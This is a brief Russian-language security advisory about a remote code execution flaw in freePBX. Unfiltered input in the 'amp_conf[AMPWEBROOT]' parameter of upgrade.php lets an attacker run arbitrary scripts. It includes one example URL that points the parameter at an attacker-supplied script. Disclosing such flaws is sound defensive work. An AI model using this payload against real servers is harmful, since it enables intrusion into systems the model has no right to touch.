Программа: freePBX

Уязвимость позволяет злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «amp_conf[AMPWEBROOT]» сценарием upgrade.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сайта.

Пример:

www.site.com/upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?

Оставить мнение